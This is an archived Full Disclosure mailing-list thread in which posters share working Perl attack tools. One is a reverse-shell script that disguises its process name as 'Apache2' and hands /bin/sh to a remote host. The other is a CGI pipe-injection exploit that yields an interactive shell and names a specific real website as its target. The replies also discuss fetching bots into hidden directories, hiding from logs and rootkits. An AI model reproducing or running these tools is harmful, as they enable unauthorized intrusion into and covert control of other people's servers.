Full Disclosure mailing list archives
Re: perl pipe exploit (drops you at a shell)
From: xD 0x41 <secn3t () gmail com>
Date: Sun, 16 Oct 2011 14:30:58 +1100
Hehe.. fuck the other one.. it does not even give you incoming Ip, it has one line, and uses bin/sh -i, so prettymuch screws up the whole session from scratch :) Also, that has been rumored to have static ip and port setting... altho, it is not so hard to make changes eh.. this one is basic, and you can even use a tiny 4 line .c file to actually drop and run the perl file ;p if you wish to make it more hidden maybe from a REALLY fkn stupid admin i would assume it would have to be , because, most ppl do check sytem logs :P the few that dont tho, is already literally, millions of attackable,pwnable, and, very useable, linux raw sockets :) Thats as good as sometimes, a baseball across the front of your server... depending how attackers use theyre systems, and eveytime someone puts up obvious logs that "i got ownedZ", theyre promoting another ownage, and culd probably NOT need with detailed blog on exactly what was done etc, wich is exactly what a good hax0r will do, is just watch hidden for ages and keep the knowledge, when it is needed though, it is usually someones log wich has helped with, sometimes even rootkit links...wich is really whats making it a big ass industry now..also the phpbot, does not discriminate against os... you find a good vuln or vector for windows, and phpbot will be all over it , sometimes even looks like windows have better uptimes, but, that could just be my own opinion, but, we dont see the uptimes of linux asmuch.. i guess windows has very short lifespan, i see people rf -rm after week of abusing theyre sys with a million bad exes, just so they can watch you executing bot cmds ;p Its a tricky thing, to rls things to public, or not to.. because, it must be spoken about but, i wish people did not need to post theyre own ownage, just coz, it is some 0day bug and they feel *special to be owned first*... Oh btw here.. #!/usr/bin/perl use Socket; $cmd= "Apache2"; $system = 'echo "`uname -a`";'; $system1= 'echo "`id`";'; $system2= 'echo "`pwd`";'; $system3= 'echo "`whoami`@`hostname`:~";'; $system4= '/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target); $paddr=sockaddr_in($port, $iaddr); $proto=getprotobyname('tcp'); socket(SOCKET,PF_INET,SOCK_STREAM,$proto); connect(SOCKET,$paddr); open(STDIN,">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "\n\n--CbacK--\n\n"; print "\nSysInfo: "; system($system); print "\nCurrent ID: "; system($system1); print "\nCurrent Dir: "; system($system2); print "\n"; system($system3); system($system4); close(STDIN); close(STDOUT); close(STDERR); ....will print exactly what you need information wise, and nothing more.. execl(), would be easier todo,I just did not want to show how to, exactly, on this list... and, i think this connectback is about as old as my fkn house, so, cpl hundred yrs or so :P Just be sure to know it is simple to execute this, perl cb.pl ip-here port-here, SOoooo eg: [xd@b0x]:~ # perl cb.pl 172.16.1.12 4444 Will connect me to a local lan box, I removed all non necessary IRC and other rubbish outputs, so the shell is optimised for, simple speed, and, yea, modify them system() cmds ;) theyre kinda there to keep it abit safer :P This is been used by kcope and many others as the simple basis for MOST GOOD shells wich will do what you want, without you having to always ask...and, i see the Iranian one sdoes exec bin/sh -i , thus killing job control :s how stupid and unneccesary, and, one extra logging! I would not handout howtos on using but is very simple if you know wat you are doin. Later, and oh, i added chmod 500 $1 , so a basic chmod for your pipe() script but atm, it is using the boxes chmod, i will code in a 'cmod' wich does same, different order/cmd use, and it does not copy over bin/chmod ofc...wich is why i think best to always just addin own chmod, but, i guess everything wich handles files on unix, should handle chmod aso you can use them :P hehe.. so i just added a basic auto-chmod for the program binary forst then anybinary used with just "chmod" cmd in the shell... very simple and sooo handy! Thats about all it really needed, now, ill connect them up, and, exchange a few things for much nicer dev/null logging, etc etc etc :> Who said FD is dead... we were just 8resting* our usually quite high IQ minds, wich factually take more time than the average NON high-IQ homosapien ... kekeke... yes, call me mad but, who cares... i dont hide it, crazycoders.com was not just a *name* sheesh.. Cheers , and, i guess used in combination, could be a very handy connectback, wich does not show logging because the method is just not visible.. although must use that little bash trick '>&' the best *feature* in bash :) Still makes connectback, so darn easy! I think u have given alot for ppl who cannot operate wget etc , well you know what i mean ;) Many ppl would like this, and appreciate it.. i do! cheers Marshall , you would be asked alot of you like Eminem i bet... or not... anyhw, Do you like EMINEM?? take care! hehe, always keep your spirits high and life even higher,Live it like its the lstday,every day! peace and great job! xd // admin @ Crazycoders.com // ( nick xd-- )#Haxnet @ Efnet for simple communication // NON racist/Polly On 16 October 2011 12:38, Marshall Whittaker <marshallwhittaker () gmail com>wrote:
Yeah, I intentionally wrote it to avoid a connect back or bindshell because a lot of firewalls block those (I've been tooling around with firewall evasion techniques lately...). I have some code laying around somewhere that does some kind of connect back from perl I think. I'd have to find it though. If you want it let me know. I think some Iranians wrote it lol. Anyway, thanks for the comments on the code. :) On Sat, Oct 15, 2011 at 9:44 PM, xD 0x41 <secn3t () gmail com> wrote:Thanks for the POST! hats VERY cool, althugh it was done before, and i did not match codes to see any differences/changes/updates, because I am aware that many systems are being fixed against this bug as I know, or rather, perl stdinout is maybe being patched in some versions, although it does seem to work stable on Debian lenny and thats ok, that would mean most likely Ubuntu is also vulnerable... Personally, i have code wich is about half the size of bth the ones i have seen, but they do a download to box, so, it is a personal wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is simply like this ./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps This would then save file, and chmod it automatically as chmod filename +x , wich is just a command i thought was critical when this type of stuff is used... So, I might try and personalise this, and see if it works better, I know the first method i was using to get, was nothing like the one i have now wich is pipe() also but, it just totally makes the need for using wget not needed, and then also the file and whole session of ./file.pl, gets saved to bash_history as a . on its own line, wich is including if you upload/get files from one box and up to the local one your sitting on. Your version, looks the most adaptive one, and would be great to have enabled on any connectback shell, maybe chmod cmd could be automatic when it puts a file upload/download, however you access it, I know main way a user on a control net, would simply privmsg it, and use that pipe exploiting to upload everything, chmod, and hide eveything, wich is probably the BEST addon i could thinkof for any rootkit, and even just upload command, if you target index.php, and look for pg=/page=, maybe a simple my @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to target things, and make it show simple CMDS> output on connect-back, then print a quick sysinfo and, makesure to show things right on the connectback, then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in if/else using the first perlpipeupload.pl as the first method.. this could be great! i will look for my code wich is more like a wget but, it uses the exact same bugs to , actually works better than the standard get/wget or fetch, as it is no switches needed, just the corect args, and it does the rest in execl() mode, thru this, i have i think in old days probably used this bug somuch, it became a feautre for awhile :P I think the scripting is great, the code is good, clear and concise,. and very easy to simply use as an addon case 'perlpipeupload2': or, however you may add it.. it is awesome code. I ight have to snippet this posting and, show both, or, al 3 on my website (crazycoders.com) ,and if you have a Posting already up wich will stay there, id be happy to point to it, and also paste it, so, thanks! i will try and find the code for the wget/put/uploader, when your in PM with a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is -s|-n for silent or notice user exact infos, prettymuch a wget-summary. I like the code and appreciate your posting. It is a nice bug and even nicer method to exploit it. regards, xd-- // #haxnet@EFnet // Independant Arsehole PS: shizzle my nizzle matey! shizzle it good! On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker () gmail comwrote:Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker < marshallwhittaker () gmail com> wrote:This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell. So have at it guys & gals! Had to resend because I got some message about my attachment being blocked. Not sure if it really was, though, I'll send again anyway. Hope this isn't spamming the list. =/ Site: http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File Useage: ./sublime.pl " http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File" Should work on most perl cgi scripts that are vulnerable to | read bug. Please note, it's not a "real" shell, but almost everything works, except things that won't go in one instance like cd-ing and env vars, etc. Play nice! --oxagast [CODE] #!/usr/bin/perl # adaptive cgi shell by oxagast use LWP::Simple; $part1 = @ARGV[0]; $part2 = @ARGV[1]; print "Making buffer...\n"; for $bet (100..200) { $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n"; } print "Exploiting...\n"; $id = get("$part1\|id\|$part2"); $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/; print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n"; $uid = $1; print "$uid\n"; while (0 == 0) { print "\$ "; $cmd = <STDIN>; chomp($cmd); if ($cmd =~ m/cd (\/.*)/) { $dir = $1; } if ($cmd eq "cd ..") { $dir =~ s/(.*)\/.*/\/\1/; } if ($cmd eq "pwd") { $dirjunk = $dir; if ($dirjunk eq "//") { $dirjunk = "/"; } } $dirjunk = "cd $dir\;$cmd"; $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr"); $cmdhex =~ s/(..)/\\\\x$1/g; get("$part1\|echo -e $bettwo > /tmp/buff\|$part2"); $backjunk2 = get("$part1\|cat /tmp/buff\|$part2"); @backjunk = split("\n", $backjunk2); get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2"); get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2"); $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2"); @backjunk_split = split("\n", $backjunk_as); $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2"); $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m; $thismanylines = $1 - 1; for $junknum (0..scalar(@backjunk_split)) { for $fuzz (10..100+$thismanylines) { if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) { $middle = $1; @backjunk[$junknum] =~ m/(.*)\Q$middle\E/; @backjunk_split[$junknum] =~ s/$1//; @backjunk[$junknum] =~ m/\Q$middle\E(.*)/; @backjunk_split[$junknum] =~ s/$1//; print "$backjunk_split[$junknum]\n"; } } } } [/CODE]_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 16)
- Message not available
- Re: perl pipe exploit (drops you at a shell) Valdis . Kletnieks (Oct 16)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)